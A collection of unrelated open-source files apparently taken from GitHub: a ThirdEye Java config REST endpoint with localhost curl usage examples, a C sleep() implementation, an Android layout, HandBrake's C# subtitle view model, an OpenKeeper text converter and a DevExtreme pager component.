* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.pinot.thirdeye.dashboard.resources.v2;
import com.google.inject.Inject;
import com.google.inject.Singleton;
import org.apache.pinot.thirdeye.config.ConfigNamespace;
import org.apache.pinot.thirdeye.datalayer.bao.ConfigManager;
import java.io.IOException;
import java.util.List;
import java.util.Map;
import javax.ws.rs.DELETE;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.codehaus.jackson.map.ObjectMapper;
import org.codehaus.jackson.type.TypeReference;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
@Produces(MediaType.APPLICATION_JSON)
@Singleton
public class ConfigResource {
private final static Logger LOG = LoggerFactory.getLogger(ConfigResource.class);
private final ConfigManager configDAO;
@Inject
public ConfigResource(ConfigManager configDAO) {
this.configDAO = configDAO;
}
@GET
@Path("/{namespace}/{name}")
public Object get(
@PathParam("namespace") String namespace,
@PathParam("name") String name) {
return makeNamespace(namespace).get(name);
}
@POST
@Path("/{namespace}/{name}")
public void put(
@PathParam("namespace") String namespace,
@PathParam("name") String name,
String payload) throws IOException {
ConfigNamespace cn = makeNamespace(namespace);
// determine suitable representation
// map
try {
cn.put(name, new ObjectMapper().readValue(payload, new TypeReference<Map<String, ?>>() {}));
LOG.info("Storing MAP '{}':'{}' = '{}'", namespace, name, payload);
return;
} catch (Exception ignore) {
// left blank
}
// list
try {
cn.put(name, new ObjectMapper().readValue(payload, new TypeReference<List<?>>() {}));
LOG.info("Storing LIST '{}':'{}' = '{}'", namespace, name, payload);
return;
} catch (Exception ignore) {
// left blank
}
// string
cn.put(name, payload);
LOG.info("Storing STRING '{}':'{}' = '{}'", namespace, name, payload);
}
@GET
@Path("/{namespace}/")
public Map<String, Object> list(
@PathParam("namespace") String namespace) {
LOG.warn("Call to a deprecated end point " + "/config/{namespace}/ " + getClass().getName());
return makeNamespace(namespace).getAll();
}
@DELETE
@Path("/{namespace}/{name}")
public void delete(
@PathParam("namespace") String namespace,
@PathParam("name") String name) throws IOException {
makeNamespace(namespace).delete(name);
}
private ConfigNamespace makeNamespace(String namespace) {
return new ConfigNamespace(namespace, this.configDAO);
}
}
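// Usage sketch (paths follow the @Path annotations above; host and port are
// assumptions for illustration only):
//   curl -X POST http://localhost:8080/config/myns/mykey -d '{"a": 1}'   -> stored as a Map
//   curl -X POST http://localhost:8080/config/myns/mykey -d '[1, 2, 3]'  -> stored as a List
//   curl -X POST http://localhost:8080/config/myns/mykey -d 'hello'      -> stored as a String
//   curl        http://localhost:8080/config/myns/mykey                  -> returns the value
// The put() method above tries the Map and List representations first and only
// falls back to a raw String when JSON parsing fails.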
| {
"pile_set_name": "Github"
} |
#include <unistd.h>
#include <time.h>
unsigned sleep(unsigned seconds)
{
struct timespec tv = { .tv_sec = seconds, .tv_nsec = 0 };
if (nanosleep(&tv, &tv))
return tv.tv_sec;
return 0;
}
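/*
 * Minimal usage sketch (not part of the original file; the SLEEP_EXAMPLE guard
 * and handler name are illustrative). Demonstrates that sleep() returns the
 * unslept remainder when nanosleep() is interrupted by a signal.
 */
#ifdef SLEEP_EXAMPLE
#include <signal.h>
#include <stdio.h>
static void on_alarm(int sig) { (void)sig; /* just interrupt nanosleep */ }
int main(void)
{
	signal(SIGALRM, on_alarm);
	alarm(1);                          /* interrupt the sleep after ~1 second */
	unsigned left = sleep(5);          /* start a 5 second sleep */
	printf("unslept: %u seconds\n", left); /* expect roughly 4 */
	return 0;
}
#endif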
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:orientation="vertical">
<TextView
android:id="@+id/tv_header"
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:layout_marginBottom="10dp"
android:background="@color/colorPrimary"
android:gravity="center"
android:textAllCaps="true"
android:textColor="@color/colorAccent"
tools:text="Repositories user" />
<android.support.v4.widget.SwipeRefreshLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:id="@+id/srl_repos"
android:layout_width="match_parent"
android:layout_height="wrap_content">
<android.support.v7.widget.RecyclerView
android:id="@+id/rv_repos"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:scrollbars="vertical"
tools:listitem="@layout/repo_view" />
</android.support.v4.widget.SwipeRefreshLayout>
</LinearLayout>
| {
"pile_set_name": "Github"
} |
// --------------------------------------------------------------------------------------------------------------------
// <copyright file="SubtitlesViewModel.cs" company="HandBrake Project (http://handbrake.fr)">
// This file is part of the HandBrake source code - It may be used under the terms of the GNU General Public License.
// </copyright>
// <summary>
// The Subtitles View Model
// </summary>
// --------------------------------------------------------------------------------------------------------------------
namespace HandBrakeWPF.ViewModels
{
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Windows;
using Caliburn.Micro;
using HandBrake.Interop.Utilities;
using HandBrakeWPF.EventArgs;
using HandBrakeWPF.Model.Subtitles;
using HandBrakeWPF.Properties;
using HandBrakeWPF.Services.Interfaces;
using HandBrakeWPF.Services.Presets.Model;
using HandBrakeWPF.Services.Scan.Model;
using HandBrakeWPF.ViewModels.Interfaces;
using HandBrakeWPF.Views;
using Microsoft.Win32;
using EncodeTask = HandBrakeWPF.Services.Encode.Model.EncodeTask;
using OutputFormat = HandBrakeWPF.Services.Encode.Model.Models.OutputFormat;
using SubtitleTrack = HandBrakeWPF.Services.Encode.Model.Models.SubtitleTrack;
using SubtitleType = HandBrakeWPF.Services.Encode.Model.Models.SubtitleType;
/// <summary>
/// The Subtitles View Model
/// </summary>
public class SubtitlesViewModel : ViewModelBase, ISubtitlesViewModel
{
private readonly IErrorService errorService;
private readonly IWindowManager windowManager;
#region Constants and Fields
private readonly Subtitle foreignAudioSearchTrack;
private IList<Subtitle> sourceTracks;
#endregion
#region Constructors and Destructors
/// <summary>
/// Initializes a new instance of the <see cref="HandBrakeWPF.ViewModels.SubtitlesViewModel"/> class.
/// </summary>
/// <param name="errorService">
/// The Error Service
/// </param>
/// <param name="windowManager">
/// The window Manager.
/// </param>
public SubtitlesViewModel(IErrorService errorService, IWindowManager windowManager)
{
this.errorService = errorService;
this.windowManager = windowManager;
this.SubtitleDefaultsViewModel = new SubtitlesDefaultsViewModel();
this.Task = new EncodeTask();
this.Langauges = LanguageUtilities.MapLanguages().Keys;
this.CharacterCodes = CharCodesUtilities.GetCharacterCodes();
this.foreignAudioSearchTrack = new Subtitle { SubtitleType = SubtitleType.ForeignAudioSearch, Language = Resources.SubtitleViewModel_ForeignAudioSearch };
this.SourceTracks = new List<Subtitle> { this.foreignAudioSearchTrack };
}
#endregion
public event EventHandler<TabStatusEventArgs> TabStatusChanged;
#region Properties
/// <summary>
/// Gets or sets the audio defaults view model.
/// </summary>
public ISubtitlesDefaultsViewModel SubtitleDefaultsViewModel { get; set; }
/// <summary>
/// Gets or sets CharacterCodes.
/// </summary>
public IEnumerable<string> CharacterCodes { get; set; }
/// <summary>
/// Gets or sets Langauges.
/// </summary>
public IEnumerable<string> Langauges { get; set; }
/// <summary>
/// Gets or sets SourceTracks.
/// </summary>
public IList<Subtitle> SourceTracks
{
get
{
return this.sourceTracks;
}
set
{
this.sourceTracks = value;
this.NotifyOfPropertyChange(() => this.SourceTracks);
}
}
/// <summary>
/// Gets or sets Task.
/// </summary>
public EncodeTask Task { get; set; }
/// <summary>
/// Gets the panel title.
/// </summary>
public string PanelTitle
{
get
{
return Resources.SubtitlesViewModel_SubTracks;
}
}
/// <summary>
/// Gets the switch display title.
/// </summary>
public string SwitchDisplayTitle
{
get
{
return Resources.SubtitlesViewModel_ConfigureDefaults;
}
}
/// <summary>
/// Gets the default audio behaviours.
/// </summary>
public SubtitleBehaviours SubtitleBehaviours
{
get
{
return this.SubtitleDefaultsViewModel.SubtitleBehaviours;
}
}
public bool IsBurnableOnly
{
get
{
return this.Task.OutputFormat == OutputFormat.WebM;
}
}
#endregion
#region Public Methods
/// <summary>
/// Add a new Track
/// </summary>
public void Add()
{
this.Add(null);
}
/// <summary>
/// Add all closed captions not already on the list.
/// </summary>
public void AddAllClosedCaptions()
{
foreach (Subtitle subtitle in this.SourceTitlesSubset(null).Where(s => s.SubtitleType == SubtitleType.CC))
{
this.Add(subtitle);
}
}
/// <summary>
/// Add all the remaining subtitle tracks.
/// </summary>
public void AddAllRemaining()
{
foreach (Subtitle subtitle in this.SourceTitlesSubset(null))
{
this.Add(subtitle);
}
}
/// <summary>
/// Add all remaining tracks for the users preferred and selected languages
/// </summary>
public void AddAllRemainingForSelectedLanguages()
{
List<Subtitle> availableTracks = this.GetSelectedLanguagesTracks();
foreach (Subtitle subtitle in this.SourceTitlesSubset(availableTracks))
{
this.Add(subtitle);
}
}
/// <summary>
/// The add first for selected languages.
/// </summary>
public void AddFirstForSelectedLanguages()
{
bool anyLanguageSelected = this.SubtitleBehaviours.SelectedLangauges.Contains(Constants.Any);
foreach (Subtitle sourceTrack in this.GetSelectedLanguagesTracks())
{
// Check if the track list already contains this track
bool found = this.Task.SubtitleTracks.Any(track => Equals(track.SourceTrack, sourceTrack));
if (!found)
{
// Check if we are already using this language
bool foundLanguage = false;
Subtitle track = sourceTrack;
foreach (var item in this.Task.SubtitleTracks)
{
if (item.SourceTrack != null && item.SourceTrack.LanguageCode != null && track.LanguageCode.Contains(item.SourceTrack.LanguageCode))
{
foundLanguage = true;
}
}
if (foundLanguage)
{
continue;
}
// If it doesn't, add it.
this.Add(sourceTrack);
// If we are using "(Any)" then break here. We only add the first track in this instance.
if (anyLanguageSelected)
{
break;
}
}
}
}
/// <summary>
/// Import an SRT File.
/// </summary>
public void Import()
{
OpenFileDialog dialog = new OpenFileDialog
{
Filter = "Subtitle files (*.srt, *.ssa, *.ass)|*.srt;*.ssa;*.ass",
CheckFileExists = true,
Multiselect = true
};
if (this.Task != null && this.Task.Source != null)
{
string path = Path.GetDirectoryName(this.Task.Source);
if (Directory.Exists(path))
{
dialog.InitialDirectory = path;
}
}
dialog.ShowDialog();
this.AddInputSubtitles(dialog.FileNames);
}
public void Import(string[] subtitleFiles)
{
if (subtitleFiles != null && subtitleFiles.Any())
{
this.AddInputSubtitles(subtitleFiles);
}
}
/// <summary>
/// Remove a Track
/// </summary>
/// <param name="track">
/// The track.
/// </param>
public void Remove(SubtitleTrack track)
{
this.Task.SubtitleTracks.Remove(track);
}
/// <summary>
/// Clear all Tracks
/// </summary>
public void Clear()
{
this.Task.SubtitleTracks.Clear();
}
/// <summary>
/// Select the default subtitle track.
/// </summary>
/// <param name="subtitle">
/// The subtitle.
/// </param>
public void SelectDefaultTrack(SubtitleTrack subtitle)
{
foreach (SubtitleTrack track in this.Task.SubtitleTracks)
{
if (track == subtitle)
{
continue; // Skip the track the user selected.
}
track.Default = false;
}
this.NotifyOfPropertyChange(() => this.Task);
}
/// <summary>
/// Select the burned in track.
/// </summary>
/// <param name="subtitle">
/// The subtitle.
/// </param>
public void SetBurnedToFalseForAllExcept(SubtitleTrack subtitle)
{
foreach (SubtitleTrack track in this.Task.SubtitleTracks)
{
if (track == subtitle)
{
continue; // Skip the track the user selected.
}
track.Burned = false;
}
this.NotifyOfPropertyChange(() => this.Task);
}
/// <summary>
/// Automatic Subtitle Selection based on user preferences.
/// </summary>
public void AutomaticSubtitleSelection()
{
this.Task.SubtitleTracks.Clear();
// Add Foreign Audio Scan
if (this.SubtitleBehaviours.AddForeignAudioScanTrack)
{
this.Add(foreignAudioSearchTrack);
}
// Add Track Behaviours
switch (this.SubtitleBehaviours.SelectedBehaviour)
{
case SubtitleBehaviourModes.FirstMatch: // Add the first matching track for each selected language
this.AddFirstForSelectedLanguages();
break;
case SubtitleBehaviourModes.AllMatching: // Add all matching tracks for the selected languages, in order.
this.AddAllRemainingForSelectedLanguages();
break;
}
// Burn In Behaviour
if (this.Task.SubtitleTracks.Count >= 1)
{
bool burnInSet = false;
switch (this.SubtitleBehaviours.SelectedBurnInBehaviour)
{
case SubtitleBurnInBehaviourModes.None:
foreach (var track in this.Task.SubtitleTracks)
{
if (track.SourceTrack.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Forced = true;
break;
}
}
break;
case SubtitleBurnInBehaviourModes.ForeignAudio:
foreach (var track in this.Task.SubtitleTracks)
{
// Set the Foreign Audio Track to burned-in
if (track.SourceTrack.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Burned = true;
track.Forced = true;
this.SetBurnedToFalseForAllExcept(track);
break;
}
}
break;
case SubtitleBurnInBehaviourModes.FirstTrack:
foreach (var track in this.Task.SubtitleTracks)
{
// Foreign Audio Search is always first in the list.
if (track.SourceTrack.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Forced = true;
continue;
}
if (!burnInSet)
{
burnInSet = true;
track.Burned = true;
this.SetBurnedToFalseForAllExcept(track);
}
}
break;
case SubtitleBurnInBehaviourModes.ForeignAudioPreferred:
foreach (var track in this.Task.SubtitleTracks)
{
// Set the first track.
if (!burnInSet)
{
burnInSet = true;
track.Burned = true;
this.SetBurnedToFalseForAllExcept(track);
}
// But if there is a foreign audio track, prefer this to the first.
if (track.SourceTrack.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Burned = true;
track.Forced = true;
this.SetBurnedToFalseForAllExcept(track);
break;
}
}
break;
}
}
// Add all closed captions if enabled.
if (this.SubtitleBehaviours.AddClosedCaptions)
{
this.AddAllClosedCaptions();
}
}
/// <summary>
/// The show audio defaults.
/// </summary>
public void ShowSubtitleDefaultsPanel()
{
SubtitlesDefaultsView view = new SubtitlesDefaultsView();
view.DataContext = this.SubtitleDefaultsViewModel;
if (view.ShowDialog() == true)
{
this.OnTabStatusChanged(null);
}
}
/// <summary>
/// Reload the audio tracks based on the defaults.
/// </summary>
public void ReloadDefaults()
{
this.AutomaticSubtitleSelection();
}
/// <summary>
/// Trigger a Notify Property Changed on the Task to force various UI elements to update.
/// </summary>
public void RefreshTask()
{
this.NotifyOfPropertyChange(() => this.Task);
this.NotifyOfPropertyChange(() => this.IsBurnableOnly);
if (this.IsBurnableOnly)
{
foreach (var subtitleTrack in this.Task.SubtitleTracks)
{
if (subtitleTrack.Default)
{
subtitleTrack.Default = false;
}
}
}
}
#endregion
#region Implemented Interfaces
/// <summary>
/// Setup this tab for the specified preset.
/// </summary>
/// <param name="preset">
/// The preset.
/// </param>
/// <param name="task">
/// The task.
/// </param>
public void SetPreset(Preset preset, EncodeTask task)
{
// Note, We don't support Subtitles in presets yet.
this.Task = task;
this.NotifyOfPropertyChange(() => this.Task);
this.SubtitleDefaultsViewModel.SetupLanguages(preset);
this.AutomaticSubtitleSelection();
}
/// <summary>
/// Update all the UI controls based on the encode task passed in.
/// </summary>
/// <param name="task">
/// The task.
/// </param>
public void UpdateTask(EncodeTask task)
{
this.Task = task;
this.NotifyOfPropertyChange(() => this.Task.SubtitleTracks);
this.NotifyOfPropertyChange(() => this.Task);
}
public bool MatchesPreset(Preset preset)
{
// Check the default behaviours.
if (preset.SubtitleTrackBehaviours.AddClosedCaptions != this.SubtitleBehaviours.AddClosedCaptions)
{
return false;
}
if (preset.SubtitleTrackBehaviours.AddForeignAudioScanTrack != this.SubtitleBehaviours.AddForeignAudioScanTrack)
{
return false;
}
if (preset.SubtitleTrackBehaviours.SelectedBehaviour != this.SubtitleBehaviours.SelectedBehaviour)
{
return false;
}
if (preset.SubtitleTrackBehaviours.SelectedBurnInBehaviour != this.SubtitleBehaviours.SelectedBurnInBehaviour)
{
return false;
}
foreach (var item in this.SubtitleBehaviours.SelectedLangauges)
{
if (!preset.SubtitleTrackBehaviours.SelectedLangauges.Contains(item))
{
return false;
}
}
return true;
}
/// <summary>
/// Setup this window for a new source
/// </summary>
/// <param name="source">
/// The source.
/// </param>
/// <param name="title">
/// The title.
/// </param>
/// <param name="preset">
/// The preset.
/// </param>
/// <param name="task">
/// The task.
/// </param>
public void SetSource(Source source, Title title, Preset preset, EncodeTask task)
{
this.SourceTracks.Clear();
this.SourceTracks.Add(foreignAudioSearchTrack);
foreach (Subtitle subtitle in title.Subtitles)
{
this.SourceTracks.Add(subtitle);
}
this.Task = task;
this.NotifyOfPropertyChange(() => this.Task);
this.AutomaticSubtitleSelection();
}
/// <summary>
/// Checks the configuration of the subtitles and warns the user about any potential issues.
/// </summary>
public bool ValidateSubtitles()
{
var nonBurnedSubtitles = this.Task.SubtitleTracks.Where(subtitleTrack => !subtitleTrack.Burned).ToList();
if (nonBurnedSubtitles.Count > 0 && this.IsBurnableOnly)
{
MessageBoxResult result = this.errorService.ShowMessageBox(
Resources.Subtitles_WebmSubtitleIncompatibilityError,
Resources.Subtitles_WebmSubtitleIncompatibilityHeader,
MessageBoxButton.OKCancel,
MessageBoxImage.Warning);
if (result == MessageBoxResult.OK)
{
foreach (var subtitleTrack in nonBurnedSubtitles)
{
if (!subtitleTrack.Burned)
{
this.Remove(subtitleTrack);
}
}
}
else if (result == MessageBoxResult.Cancel)
{
return false;
}
else
{
return false;
}
}
return true;
}
#endregion
#region Methods
protected virtual void OnTabStatusChanged(TabStatusEventArgs e)
{
this.TabStatusChanged?.Invoke(this, e);
}
/// <summary>
/// Add a subtitle track.
/// The Source track is set based on the following order. If null, it will skip to the next option.
/// 1. Passed-in Subtitle param
/// 2. First preferred Subtitle from source
/// 3. First subtitle from source.
/// Will not add a subtitle if the source has none.
/// </summary>
/// <param name="subtitle">
/// The subtitle. Use null to add preferred, or first from source (based on user preference)
/// </param>
private void Add(Subtitle subtitle)
{
Subtitle source = subtitle
?? ((this.SourceTracks != null)
? (this.SourceTracks.FirstOrDefault(l => l.Language == this.GetPreferredSubtitleTrackLanguage())
?? this.SourceTracks.FirstOrDefault(
s => s.SubtitleType != SubtitleType.ForeignAudioSearch))
: null);
if (source == null)
{
source = foreignAudioSearchTrack;
}
SubtitleTrack track = new SubtitleTrack
{
SubtitleType = source.SubtitleType,
SourceTrack = source,
};
// Burn-in Behaviours
if (this.SubtitleBehaviours.SelectedBurnInBehaviour == SubtitleBurnInBehaviourModes.ForeignAudio
|| this.SubtitleBehaviours.SelectedBurnInBehaviour == SubtitleBurnInBehaviourModes.ForeignAudioPreferred)
{
if (subtitle != null && subtitle.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Burned = true;
this.SetBurnedToFalseForAllExcept(track);
}
}
// For MP4, PGS Subtitles must be burned in.
if (!track.Burned && (source.SubtitleType == SubtitleType.PGS) && this.Task != null && this.Task.OutputFormat == OutputFormat.Mp4)
{
if (this.Task.SubtitleTracks.Any(a => a.Burned))
{
return; // We can't add any more burned in tracks.
}
if (track.CanBeBurned)
{
track.Burned = true;
this.SetBurnedToFalseForAllExcept(track);
}
}
var encodeTask = this.Task;
if (encodeTask != null)
{
encodeTask.SubtitleTracks.Add(track);
}
}
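// Selection-order sketch (illustrative): with a preferred language of "fra" and
// source tracks [Foreign Audio Search, eng, fra], Add(null) resolves to the "fra"
// track; without a language match it falls back to the first non-FAS track; and
// with no usable source track at all the Foreign Audio Search placeholder is added.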
/// <summary>
/// Gets a list of source tracks for the users selected languages.
/// </summary>
/// <returns>
/// A list of source subtitle tracks.
/// </returns>
private List<Subtitle> GetSelectedLanguagesTracks()
{
// Translate to Iso Codes
List<string> iso6392Codes = new List<string>();
if (this.SubtitleBehaviours.SelectedLangauges.Contains(Constants.Any))
{
iso6392Codes = LanguageUtilities.GetIsoCodes();
iso6392Codes = LanguageUtilities.OrderIsoCodes(iso6392Codes, this.SubtitleBehaviours.SelectedLangauges);
}
else
{
iso6392Codes = LanguageUtilities.GetLanguageCodes(this.SubtitleBehaviours.SelectedLangauges.ToArray());
}
List<Subtitle> orderedSubtitles = new List<Subtitle>();
foreach (string code in iso6392Codes)
{
orderedSubtitles.AddRange(this.SourceTracks.Where(subtitle => subtitle.LanguageCodeClean == code));
}
return orderedSubtitles;
}
/// <summary>
/// The get preferred subtitle track, or the first if none available.
/// </summary>
/// <returns>
/// The users preferred language, or the first if none available.
/// </returns>
private string GetPreferredSubtitleTrackLanguage()
{
string langName = this.SubtitleBehaviours.SelectedLangauges.FirstOrDefault(w => w != Constants.Any);
string langCode = LanguageUtilities.GetLanguageCode(langName);
return langCode;
}
/// <summary>
/// Gets a list of Source subtitle tracks that are not currently used.
/// </summary>
/// <param name="subtitles">
/// The subtitles. (Optional). If null, works on the full source subtitle collection
/// </param>
/// <returns>
/// An IEnumerable collection of subtitles
/// </returns>
private IEnumerable<Subtitle> SourceTitlesSubset(IEnumerable<Subtitle> subtitles)
{
return subtitles != null
? subtitles.Where(subtitle => !this.Task.SubtitleTracks.Any(track => Equals(track.SourceTrack, subtitle))).ToList()
: this.SourceTracks.Where(subtitle => !this.Task.SubtitleTracks.Any(track => Equals(track.SourceTrack, subtitle))).ToList();
}
private void AddInputSubtitles(string[] filenames)
{
foreach (var srtFile in filenames)
{
if (!File.Exists(srtFile))
{
continue;
}
SubtitleTrack track = new SubtitleTrack
{
SrtFileName = Path.GetFileNameWithoutExtension(srtFile),
SrtOffset = 0,
SrtCharCode = "UTF-8",
SrtLang = "English",
SubtitleType = SubtitleType.SRT,
SrtPath = srtFile
};
this.Task.SubtitleTracks.Add(track);
}
}
#endregion
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014-2020 OpenKeeper
*
* OpenKeeper is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* OpenKeeper is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with OpenKeeper. If not, see <http://www.gnu.org/licenses/>.
*/
package toniarts.openkeeper.tools.convert.conversion.task;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.nio.file.FileVisitOption;
import java.nio.file.FileVisitResult;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.SimpleFileVisitor;
import java.nio.file.attribute.BasicFileAttributes;
import java.util.ArrayList;
import java.util.EnumSet;
import java.util.List;
import java.util.Map;
import java.util.logging.Level;
import java.util.logging.Logger;
import toniarts.openkeeper.tools.convert.AssetsConverter;
import toniarts.openkeeper.tools.convert.str.MbToUniFile;
import toniarts.openkeeper.tools.convert.str.StrFile;
import toniarts.openkeeper.utils.AssetUtils;
import toniarts.openkeeper.utils.PathUtils;
/**
* Dungeon Keeper II texts conversion. Converts all interface texts to plain
* Java resource bundles.
*
* @author Toni Helenius <[email protected]>
*/
public class ConvertTexts extends ConversionTask {
private static final Logger LOGGER = Logger.getLogger(ConvertTexts.class.getName());
public ConvertTexts(String dungeonKeeperFolder, String destination, boolean overwriteData) {
super(dungeonKeeperFolder, destination, overwriteData);
}
@Override
public void internalExecuteTask() {
convertTexts(dungeonKeeperFolder, destination);
}
/**
* Extract and copy DK II interface texts
*
* @param dungeonKeeperFolder DK II main folder
* @param destination Destination folder
*/
private void convertTexts(String dungeonKeeperFolder, String destination) {
LOGGER.log(Level.INFO, "Extracting texts to: {0}", destination);
updateStatus(null, null);
AssetUtils.deleteFolder(new File(destination));
String dataDirectory = dungeonKeeperFolder + PathUtils.DKII_TEXT_DEFAULT_FOLDER;
// Find all the STR files
final List<File> srtFiles = new ArrayList<>();
File dataDir = new File(dataDirectory);
try {
Files.walkFileTree(dataDir.toPath(), EnumSet.noneOf(FileVisitOption.class), 1, new SimpleFileVisitor<Path>() {
@Override
public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) throws IOException {
//Get all the STR files
if (attrs.isRegularFile() && file.getFileName().toString().toLowerCase().endsWith(".str")) {
srtFiles.add(file.toFile());
}
//Always continue
return FileVisitResult.CONTINUE;
}
});
} catch (IOException ex) {
String msg = "Failed to scan texts folder " + dataDirectory + "!";
LOGGER.log(Level.SEVERE, msg, ex);
throw new RuntimeException(msg, ex);
}
// Convert the STR files to JAVA native resource bundles
new File(destination).mkdirs(); // Ensure that the folder exists
int i = 0;
int total = srtFiles.size();
MbToUniFile codePage = null;
for (File file : srtFiles) {
updateStatus(i, total);
i++;
// The code page cache makes processing faster
StrFile strFile;
if (codePage == null) {
strFile = new StrFile(file);
codePage = strFile.getCodePage();
} else {
strFile = new StrFile(codePage, file);
}
// Write the properties
String fileName = file.getName();
fileName = fileName.substring(0, fileName.length() - 3);
File dictFile = new File(destination.concat(fileName).concat("properties"));
try (PrintWriter pw = new PrintWriter(new OutputStreamWriter(new FileOutputStream(dictFile, false), "UTF-8"))) {
for (Map.Entry<Integer, String> entry : strFile.getEntriesAsSet()) {
pw.println(entry.getKey() + "=" + entry.getValue());
}
} catch (IOException ex) {
String msg = "Failed to save the dictionary file to " + dictFile + "!";
LOGGER.log(Level.SEVERE, msg, ex);
throw new RuntimeException(msg, ex);
}
}
}
@Override
public AssetsConverter.ConvertProcess getConvertProcess() {
return AssetsConverter.ConvertProcess.INTERFACE_TEXTS;
}
}
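// Output sketch (keys and values are illustrative, not real game text): each
// converted <name>.properties file holds one "id=text" line per STR entry, e.g.
//   1=New Game
//   2=Load Game
// which can then be loaded as a plain Java resource bundle.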
| {
"pile_set_name": "Github"
} |
import {
Component, ComponentBindings, JSXComponent, OneWay, Fragment, Consumer,
} from 'devextreme-generator/component_declaration/common';
import { LightButton } from '../common/light_button';
import { PagesLarge } from './large';
import { PagesSmall } from './small';
import PagerProps from '../common/pager_props';
import { ConfigContextValue, ConfigContext } from '../../common/config_context';
const PAGER_NAVIGATE_BUTTON = 'dx-navigate-button';
const PAGER_PREV_BUTTON_CLASS = 'dx-prev-button';
const PAGER_NEXT_BUTTON_CLASS = 'dx-next-button';
export const PAGER_BUTTON_DISABLE_CLASS = 'dx-button-disable';
const nextButtonClassName = `${PAGER_NAVIGATE_BUTTON} ${PAGER_NEXT_BUTTON_CLASS}`;
const prevButtonClassName = `${PAGER_NAVIGATE_BUTTON} ${PAGER_PREV_BUTTON_CLASS}`;
const nextButtonDisabledClassName = `${PAGER_BUTTON_DISABLE_CLASS} ${PAGER_NAVIGATE_BUTTON} ${PAGER_NEXT_BUTTON_CLASS}`;
const prevButtonDisabledClassName = `${PAGER_BUTTON_DISABLE_CLASS} ${PAGER_NAVIGATE_BUTTON} ${PAGER_PREV_BUTTON_CLASS}`;
// eslint-disable-next-line @typescript-eslint/explicit-function-return-type
export const viewFunction = ({
renderPrevButton,
renderNextButton,
prevClassName,
navigateToPrevPage,
nextClassName,
navigateToNextPage,
pageIndexChange,
props: {
isLargeDisplayMode, maxPagesCount,
pageCount, pageIndex, pagesCountText,
},
}: PageIndexSelector) => (
<Fragment>
{renderPrevButton && (
<LightButton
className={prevClassName}
label="Previous page"
onClick={navigateToPrevPage}
/>
)}
{isLargeDisplayMode && (
<PagesLarge
maxPagesCount={maxPagesCount}
pageCount={pageCount}
pageIndex={pageIndex}
pageIndexChange={pageIndexChange}
/>
)}
{!isLargeDisplayMode && (
<PagesSmall
pageCount={pageCount}
pageIndex={pageIndex}
pageIndexChange={pageIndexChange}
pagesCountText={pagesCountText}
/>
)}
{renderNextButton && (
<LightButton
className={nextClassName}
label="Next page"
onClick={navigateToNextPage}
/>
)}
</Fragment>
);
type Direction = 'next' | 'prev';
function getIncrement(direction: Direction): number {
return direction === 'next' ? +1 : -1;
}
/* istanbul ignore next: class has only props default */
@ComponentBindings()
export class PageIndexSelectorProps {
@OneWay() isLargeDisplayMode = true;
}
type PageIndexSelectorPropsType = Pick<PagerProps,
'hasKnownLastPage' | 'maxPagesCount' | 'pageCount' | 'pageIndex' | 'pageIndexChange' | 'pagesCountText' |
'showNavigationButtons' | 'totalCount'> & PageIndexSelectorProps;
@Component({ defaultOptionRules: null, view: viewFunction })
export class PageIndexSelector extends JSXComponent<PageIndexSelectorPropsType>() {
@Consumer(ConfigContext)
config?: ConfigContextValue;
private getNextDirection(): Direction {
return !this.config?.rtlEnabled ? 'next' : 'prev';
}
private getPrevDirection(): Direction {
return !this.config?.rtlEnabled ? 'prev' : 'next';
}
private canNavigateToPage(pageIndex: number): boolean {
if (!this.props.hasKnownLastPage) {
return pageIndex >= 0;
}
return (pageIndex >= 0 && pageIndex <= (this.props.pageCount as number) - 1);
}
private getNextPageIndex(direction: Direction): number {
return (this.props.pageIndex as number) + getIncrement(direction);
}
private canNavigateTo(direction: Direction): boolean {
return this.canNavigateToPage(this.getNextPageIndex(direction));
}
private navigateToPage(direction: Direction): void {
this.pageIndexChange(this.getNextPageIndex(direction));
}
get renderPrevButton(): boolean {
const {
isLargeDisplayMode,
showNavigationButtons,
} = this.props;
return !isLargeDisplayMode || showNavigationButtons;
}
get renderNextButton(): boolean {
return this.renderPrevButton || !this.props.hasKnownLastPage;
}
get nextClassName(): string {
const direction = this.getNextDirection();
const canNavigate = this.canNavigateTo(direction);
return canNavigate ? nextButtonClassName : nextButtonDisabledClassName;
}
get prevClassName(): string {
const direction = this.getPrevDirection();
const canNavigate = this.canNavigateTo(direction);
return canNavigate ? prevButtonClassName : prevButtonDisabledClassName;
}
pageIndexChange(pageIndex: number): void {
if (this.canNavigateToPage(pageIndex)) {
this.props.pageIndex = pageIndex;
}
}
navigateToNextPage(): void {
this.navigateToPage(this.getNextDirection());
}
navigateToPrevPage(): void {
this.navigateToPage(this.getPrevDirection());
}
}
